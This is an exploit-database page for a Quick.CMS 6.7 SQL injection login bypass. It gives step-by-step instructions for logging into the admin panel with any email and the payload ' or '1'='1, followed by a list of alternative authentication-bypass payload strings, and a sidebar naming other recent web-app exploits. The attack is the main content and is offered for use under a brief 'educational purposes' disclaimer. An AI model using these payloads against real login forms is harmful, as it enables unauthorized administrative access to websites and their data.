Quick.cms 6.7 sql injection login bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-18 | Type : webapps | Platform : php
This exploit / vulnerability Quick.cms 6.7 sql injection login bypass is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
# Version: 6.7
# Tested on: Windows
# CVE : N/A

How to exploit :

*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : root@root.com<mailto:root@root.com>
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!

*--> SQL Injection Authentication Bypass Payload : ' or '1'='1

*--> Payloads Can be use :

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '

Quick.cms 6.7 sql injection login bypass


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Quick.cms 6.7 sql injection login bypass Vulnerability / Exploit